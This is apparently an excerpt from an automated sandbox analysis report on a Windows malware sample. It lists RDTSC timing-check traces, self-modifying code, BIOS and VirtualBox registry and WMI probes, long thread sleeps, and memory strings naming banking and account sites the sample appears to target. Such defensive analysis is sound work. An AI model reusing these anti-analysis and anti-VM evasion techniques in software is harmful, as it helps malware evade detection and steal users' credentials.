              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683A9F second address: 683AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68416E second address: 684172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684172 second address: 684192 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D48Eh 0x00000007 jg 00007F02B8F2D486h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F02B8F2D486h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684192 second address: 684198 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684198 second address: 6841A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6841A0 second address: 6841A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684C08 second address: 684C10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684C10 second address: 684C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6879B1 second address: 6879B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6879B5 second address: 6879B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6879B9 second address: 6879DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F02B8F2D493h 0x0000000d popad 0x0000000e je 00007F02B8F2D4A8h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6875BB second address: 6875C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6923BE second address: 6923CC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6923CC second address: 6923DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F275EFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 699706 second address: 699712 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F02B8F2D486h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 699712 second address: 699720 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F02B8F275E8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 699720 second address: 699724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 699724 second address: 699755 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F02B8F275E6h 0x00000008 jmp 00007F02B8F275F3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push edx 0x00000013 jng 00007F02B8F275E6h 0x00000019 pop edx 0x0000001a push edi 0x0000001b pushad 0x0000001c popad 0x0000001d pop edi 0x0000001e push ecx 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8E43 second address: 6A8E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8E47 second address: 6A8E65 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F02B8F275F8h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0CFF second address: 6C0D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C143F second address: 6C1445 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C189A second address: 6C18A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C18A3 second address: 6C18A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C18A9 second address: 6C18C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007F02B8F2D493h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C18C9 second address: 6C18D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C18D2 second address: 6C18EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02B8F2D492h 0x00000009 jnl 00007F02B8F2D486h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C18EE second address: 6C18F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C8A53 second address: 6C8A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CA2E0 second address: 6CA30B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 jns 00007F02B8F275F7h 0x0000000d push esi 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop esi 0x00000011 push ebx 0x00000012 ja 00007F02B8F275E6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E0140 second address: 5E0144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E0378 second address: 5E039E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F275F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007F02B8F275EAh 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C403C9 second address: 4C403DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02B8F2D48Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C403DB second address: 4C403F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov si, 05C9h 0x0000000e mov bh, ah 0x00000010 popad 0x00000011 mov dword ptr [esp], ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C403F5 second address: 4C403F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C403F9 second address: 4C403FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C403FF second address: 4C40412 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 movsx ebx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40412 second address: 4C40418 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40418 second address: 4C40435 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02B8F2D499h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40435 second address: 4C40439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40439 second address: 4C4044A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4044A second address: 4C40450 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70497 second address: 4C704C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D499h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx esi, bx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C704C1 second address: 4C704CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F275EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C704CF second address: 4C7053C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D48Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F02B8F2D494h 0x00000011 sub eax, 6F2461D8h 0x00000017 jmp 00007F02B8F2D48Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F02B8F2D498h 0x00000023 or esi, 19F5AC38h 0x00000029 jmp 00007F02B8F2D48Bh 0x0000002e popfd 0x0000002f popad 0x00000030 mov ebp, esp 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 movzx eax, di 0x00000038 popad 0x00000039 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7053C second address: 4C7054F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02B8F275EFh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70678 second address: 4C7067E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7067E second address: 4C706BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a jmp 00007F02B8F275F7h 0x0000000f je 00007F02B8F27632h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F02B8F275F5h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C706E2 second address: 4C70728 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D48Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, esi 0x0000000b pushad 0x0000000c mov esi, 62BCE6FBh 0x00000011 mov ah, F7h 0x00000013 popad 0x00000014 pop esi 0x00000015 jmp 00007F02B8F2D493h 0x0000001a leave 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F02B8F2D495h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70728 second address: 4C6001D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a retn 0004h 0x0000000d nop 0x0000000e cmp eax, 00000000h 0x00000011 setne al 0x00000014 xor ebx, ebx 0x00000016 test al, 01h 0x00000018 jne 00007F02B8F275E7h 0x0000001a xor eax, eax 0x0000001c sub esp, 08h 0x0000001f mov dword ptr [esp], 00000000h 0x00000026 mov dword ptr [esp+04h], 00000000h 0x0000002e call 00007F02BD780A23h 0x00000033 mov edi, edi 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F02B8F275F9h 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6001D second address: 4C600F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D491h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F02B8F2D48Eh 0x0000000f push eax 0x00000010 jmp 00007F02B8F2D48Bh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F02B8F2D496h 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F02B8F2D48Eh 0x00000024 jmp 00007F02B8F2D495h 0x00000029 popfd 0x0000002a push eax 0x0000002b mov dx, 7202h 0x0000002f pop ebx 0x00000030 popad 0x00000031 push FFFFFFFEh 0x00000033 pushad 0x00000034 push esi 0x00000035 call 00007F02B8F2D48Bh 0x0000003a pop esi 0x0000003b pop edi 0x0000003c jmp 00007F02B8F2D496h 0x00000041 popad 0x00000042 call 00007F02B8F2D489h 0x00000047 pushad 0x00000048 push esi 0x00000049 push ebx 0x0000004a pop eax 0x0000004b pop edi 0x0000004c jmp 00007F02B8F2D496h 0x00000051 popad 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F02B8F2D48Eh 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C600F1 second address: 4C60127 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F02B8F275F1h 0x00000008 mov dx, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F02B8F275EDh 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a mov dx, 2F82h 0x0000001e push eax 0x0000001f push edx 0x00000020 push ebx 0x00000021 pop esi 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60127 second address: 4C60180 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F02B8F2D495h 0x00000008 and cx, 1B56h 0x0000000d jmp 00007F02B8F2D491h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F02B8F2D48Ah 0x00000023 adc ecx, 7A8ABD78h 0x00000029 jmp 00007F02B8F2D48Bh 0x0000002e popfd 0x0000002f pushad 0x00000030 popad 0x00000031 popad 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60180 second address: 4C60232 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F02B8F275F5h 0x00000008 call 00007F02B8F275F0h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 push edi 0x00000014 mov ax, 60D9h 0x00000018 pop eax 0x00000019 pushfd 0x0000001a jmp 00007F02B8F275EFh 0x0000001f adc ch, 0000004Eh 0x00000022 jmp 00007F02B8F275F9h 0x00000027 popfd 0x00000028 popad 0x00000029 push FB88FE7Fh 0x0000002e pushad 0x0000002f jmp 00007F02B8F275EDh 0x00000034 mov esi, 76EEEC47h 0x00000039 popad 0x0000003a add dword ptr [esp], 7B0C2CF1h 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 mov ax, bx 0x00000047 pushfd 0x00000048 jmp 00007F02B8F275EBh 0x0000004d xor cl, 0000000Eh 0x00000050 jmp 00007F02B8F275F9h 0x00000055 popfd 0x00000056 popad 0x00000057 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60232 second address: 4C60238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60238 second address: 4C6023C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6023C second address: 4C60240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60240 second address: 4C60268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000000h] 0x0000000e jmp 00007F02B8F275EFh 0x00000013 nop 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 movsx edx, si 0x0000001a mov dx, si 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60268 second address: 4C6026E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6026E second address: 4C60272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60272 second address: 4C60297 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F02B8F2D498h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60297 second address: 4C6029D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6029D second address: 4C602CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D48Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F02B8F2D490h 0x0000000f sub esp, 18h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push edx 0x00000018 pop esi 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C602CB second address: 4C60341 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F02B8F275EEh 0x00000009 xor cx, BA08h 0x0000000e jmp 00007F02B8F275EBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F02B8F275EBh 0x00000021 jmp 00007F02B8F275F3h 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007F02B8F275F8h 0x0000002d sub esi, 6C4AAEC8h 0x00000033 jmp 00007F02B8F275EBh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60341 second address: 4C60347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60347 second address: 4C6034B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6034B second address: 4C6034F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6034F second address: 4C60362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop eax 0x0000000e mov bx, 8C1Ah 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60362 second address: 4C603B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D490h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F02B8F2D490h 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movsx edi, cx 0x00000016 pushfd 0x00000017 jmp 00007F02B8F2D496h 0x0000001c or cx, 45E8h 0x00000021 jmp 00007F02B8F2D48Bh 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 42EB8D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 42EC6C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 5D3A7A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 65B754 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 3813
Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 2040
Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 3350
Source: C:\Users\user\Desktop\file.exe TID: 6480 | Thread sleep count: 58 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6480 | Thread sleep time: -116058s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 1280 | Thread sleep count: 3813 > 30
Source: C:\Users\user\Desktop\file.exe TID: 1280 | Thread sleep time: -7629813s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 4632 | Thread sleep time: -40000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2196 | Thread sleep time: -90000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2828 | Thread sleep count: 2040 > 30
Source: C:\Users\user\Desktop\file.exe TID: 2828 | Thread sleep time: -4082040s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5448 | Thread sleep count: 116 > 30
Source: C:\Users\user\Desktop\file.exe TID: 5448 | Thread sleep time: -232116s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 1280 | Thread sleep count: 3350 > 30
Source: C:\Users\user\Desktop\file.exe TID: 1280 | Thread sleep time: -6703350s >= -30000s
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Comms
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\CEF
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\com.adobe.dunamis
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\D3DSCache
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\LocalLow\Microsoft
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: file.exe, 00000000.00000002.3299367042.00000000005B5000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696487552f
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
